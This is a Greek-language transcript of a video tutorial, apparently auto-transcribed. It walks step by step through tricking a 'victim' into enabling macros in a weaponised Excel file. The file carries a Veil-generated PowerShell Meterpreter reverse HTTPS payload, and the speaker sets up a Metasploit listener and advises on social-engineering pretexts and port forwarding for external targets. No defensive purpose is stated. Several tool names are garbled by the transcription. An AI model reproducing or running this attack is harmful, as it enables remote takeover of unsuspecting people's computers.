Καλησπέρα φίλοι μου, να είμαι και πάλι με ένα νέο βίντεο. Σε αυτό το βίντεο αυτό που θα δούμε, να πω ότι βασίζεται αρχικά στο social engineering. Η επίθεση που θα δούμε σε αυτό το βίντεο έχει ως εξής. Θα χρησιμοποιήσουμε ένα Excel αρχείο στο οποίο θα έχουμε ενεργοποιήσει τα μάκρο, και εδώ είναι και το δύσκολο κομμάτι, αν θέλετε, του social engineering, να πείσετε το θύμα σας να ενεργοποιήσει τα μάκρο. Μπορείτε να του πείτε ότι για τη σωστή λειτουργία ίσως του γραφήματος να πρέπει να ενεργοποιήσει τα μάκρο και τα σχετικά, ή μπορεί και από μόνος του θα δείτε πως εμφανίζεται το warning, μπορεί και από μόνος του να πατήσει ενεργοποίηση. Τι θα κάνουμε επί της ουσίας? Θα χρησιμοποιήσουμε το Veli Version για να δημιουργήσουμε ένα payload, το ονειό μας με λίγα λόγια. Από εκεί και πέρα θα χρησιμοποιήσουμε ακόμα ένα tool, λέγεται Macroshop. Όχι, ναι, Macroshop, σωστά, το οποίο θα δημιουργήσει τον κώδικα που θα εισάγουμε στο Excel αρχείο, και με το Metasploit φυσικά θα τρέξουμε το exploit multi-handler για να πάρουμε την επιστροφή της σύνδεσης. Και όταν λοιπόν το θύμα μας ανοίξει το συγκεκριμένο Excel αρχείο, εμείς εκείνη τη στιγμή θα πρέπει να έχουμε ένα meter splitter session. Πάμε λοιπόν να δούμε λίγο πρακτικά πώς γίνεται το όλο κομμάτι. Ναι, αυτά μείναν από πριν. Ωραία. Αρχικά θα χρησιμοποιήσουμε το Veli Version. Θέλουμε το 21, PowerShell Meter Splitter Reverse HTTPS. Set lhost την IP μας και set lport. Αυτή τη στιγμή, επειδή είμαστε στο ίδιο δίκτυο, αυτά που βλέπετε γίνεται local, δεν χρειάζεται να θέσουμε κάποια πόρτα. Εάν η επίθεση γινόταν σε εξωτερικό δίκτυο, στο lhost θα έπρεπε να βάλετε την εξωτερική σας IP και στο lport την πόρτα την οποία έχετε κάνει port forwarding. Options, ωραία. Ας δώσουμε το όνομα workgroup. Αυτή είναι η διαδρομή που βρίσκεται το αρχείο μας και θα το πάρουμε, θα το κάνουμε μια μεταφορά στην επιφάνεια εργασίας. Πολύ ωραία. Θα βγούμε από το Veil. Θα ανοίξουμε το Metasploit. Ταυτόχρονα ας δημιουργήσουμε και το macro code για το Excel. Όπως θα δείτε, το macrochef.py είναι το αρχείο που θέλουμε να τρέξουμε, είναι σε Python. Η πρώτη παράμετρος που δίνουμε είναι το path του αρχείου μας και η δεύτερη το path που θέλουμε να κάνουμε export. Workgroup σε txt μορφή το αρχείο μας. Αυτό εδώ είναι το shell code μας. Θα πάρουμε αυτό εδώ και θα το κάνουμε μια μεταφορά στο σύστημα των Windows.
και θα τρέξουμε και το payload, θα βάλουμε Windows Interpreter Reverse HTTPS. Set lhost 192.168.1.100. Set lport 842. Show options, exploit, όλα σωστά. Ας τα αφήσουμε αυτό να τρέχει και πάμε στο σύστημα των Windows. Όπως θα δείτε υπάρχει το AVG σαν antivirus, όχι τίποτα σπουδαίο. Τα rules του firewall είναι ενεργοποιημένα. Πάμε λοιπόν, θέλουμε αυτό το αρχείο, τον κωδικά μας, copy. Ανοίξουμε το Excel. Λοιπόν, κάτω ταμπέλα Developer, Visual Basic, This Workbook, Copy, Paste, Save, και εδώ θέλουμε να βάλουμε Excel Macro Enabled Workbook και Book 1 το όνομα του. Θα το βάλουμε στην επιφάνεια εργασίας. Πολύ ωραία. Να το. Μόλις το τρέξει το θύμα μας, θα πρέπει εδώ να μας έρθει το Meterpreter. Μόλις θα δείτε, εμφανίζεται αυτό το warning. Security warning, macros have been disabled. Πάμε να δούμε. Δεν μας έχει έρθει ακόμα τίποτα. Μόλις πατήσουμε Enable Content, ήρθε το Meterpreter Session. Λοιπόν, από εδώ και πέρα μπορείτε να ψάξετε για αρχεία μες στο σύστημα, μπορείτε να πάρετε δικαιώματα διαχειριστή, μπορείτε να κάνετε πολλά πράγματα. Δεν θα προχωρήσω σε κάτι τέτοιο. Αυτό ήταν για ακόμα ένα βίντεο. Θα τα πούμε στο επόμενο. Γεια σας.